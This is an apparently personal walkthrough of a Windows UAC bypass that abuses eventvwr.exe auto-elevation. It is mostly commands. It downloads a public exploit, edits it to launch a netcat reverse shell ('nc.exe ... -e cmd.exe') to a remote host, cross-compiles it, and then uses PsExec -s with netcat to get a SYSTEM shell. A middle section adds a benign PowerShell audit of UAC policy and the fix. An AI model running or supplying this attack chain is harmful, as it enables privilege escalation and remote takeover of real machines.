Metasploit
Use Metasploit’s “exploit/windows/local/bypassuac_eventvwr”
UAC Bypass – Manual
copy \\x.x.x.x\myshare\SysinternalsSuite\PsExec64.exe PsExec64.exe
copy \\x.x.x.x\myshare\SysinternalsSuite\PsExec.exe PsExec.exe
copy \\x.x.x.x\myshare\SysinternalsSuite\strings64.exe strings64.exe
copy \\x.x.x.x\myshare\SysinternalsSuite\strings.exe strings.exe
copy \\x.x.x.x\myshare\nc.exe nc.exe
Check initial privileges
whoami /priv
.\PsExec64.exe -i -accepteula -d -s cmd.exe
As expected, this does not work; it gives “The handle is invalid” because the shell is not yet elevated.
Check registry
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
Check autoelevate
where /r C:\windows eventvwr.exe
strings64.exe -accepteula C:\Windows\System32\eventvwr.exe | findstr /i autoelevate
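The two checks above (the UAC policy values under the Policies\System key and the autoElevate flag in the manifest of eventvwr.exe) are the same ones an administrator runs when auditing a host for this class of bypass. The PowerShell below is an added example written from that auditing angle; it is not part of the original notes. The registry path and the eventvwr.exe location are taken from the notes; the meanings assigned to ConsentPromptBehaviorAdmin are Microsoft's documented UAC settings, and the assumption that auto-elevation is only honoured below the "Always notify" level is stated in the code as the reason the flag matters.

```powershell
# Added example (not from the original notes): audit the UAC policy keys and
# the autoElevate manifest flag that the notes inspect with reg query and strings64.exe.

function Get-UacPolicy {
    # Registry path from the notes; these are the documented UAC policy values.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key -ErrorAction Stop

    # Documented meanings of ConsentPromptBehaviorAdmin for members of Administrators.
    $adminBehavior = @{
        0 = 'Elevate without prompting'
        1 = 'Prompt for credentials on the secure desktop'
        2 = 'Prompt for consent on the secure desktop (Always notify)'
        3 = 'Prompt for credentials'
        4 = 'Prompt for consent'
        5 = 'Prompt for consent for non-Windows binaries (default)'
    }

    # An absent value means the Windows default applies (EnableLUA=1, CPBA=5).
    $enableLua = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 1 }
    $cpba      = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }

    [pscustomobject]@{
        EnableLUA                  = $enableLua
        ConsentPromptBehaviorAdmin = $cpba
        AdminBehavior              = $adminBehavior[$cpba]
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        # Assumption documented here: signed Windows binaries are auto-elevated only
        # when UAC is on and the level is below "Always notify" (value 2). At level 2
        # the autoElevate manifest flag is ignored and a consent prompt is shown.
        AutoElevateHonoured        = ($enableLua -eq 1 -and $cpba -ne 2)
    }
}

function Test-AutoElevateManifest {
    param([string]$Path = "$env:SystemRoot\System32\eventvwr.exe")
    # The embedded manifest is plain XML inside the PE resource section, so a
    # string search over the raw bytes is enough; same idea as strings | findstr.
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    $text  = [System.Text.Encoding]::ASCII.GetString($bytes)
    $m = [regex]::Match($text, '<autoElevate>\s*(true|false)\s*</autoElevate>', 'IgnoreCase')
    [pscustomobject]@{
        Path        = $Path
        HasManifest = ($text -match '<assembly')
        AutoElevate = if ($m.Success) { $m.Groups[1].Value.ToLower() -eq 'true' } else { $false }
    }
}

# Usage: run from any (non-elevated) PowerShell on the host being audited.
Get-UacPolicy | Format-List
Test-AutoElevateManifest | Format-List
```

A host where Get-UacPolicy reports AutoElevateHonoured = True and Test-AutoElevateManifest reports AutoElevate = True for eventvwr.exe is exposed to the technique in these notes; raising the UAC level to "Always notify" (ConsentPromptBehaviorAdmin = 2 with PromptOnSecureDesktop = 1) is the configuration change that removes the silent auto-elevation path.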
Download and modify exploit
wget -O eventvwr-bypassuac.c https://raw.githubusercontent.com/turbo/zero2hero/master/main.c
Uncomment code and add command to execute.
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\nc.exe -nv x.x.x.x 4444 -e cmd.exe");
Cross-Compile exploit
x86_64-w64-mingw32-gcc eventvwr-bypassuac.c -o eventvwr-bypassuac-64.exe
Start a listener and run the exploit
sudo nc -nlvp 4444
copy \\x.x.x.x\myshare\eventvwr-bypassuac-64.exe eventvwr-bypassuac-64.exe
.\eventvwr-bypassuac-64.exe
whoami /priv
Start a listener and run PsExec
sudo nc -nlvp 4445
.\PsExec64.exe -i -accepteula -d -s C:\Users\<username>\Desktop\nc.exe -nv x.x.x.x 4445 -e C:\Windows\System32\cmd.exe
Should give NT AUTHORITY\SYSTEM, since the -s switch runs the command as the SYSTEM account.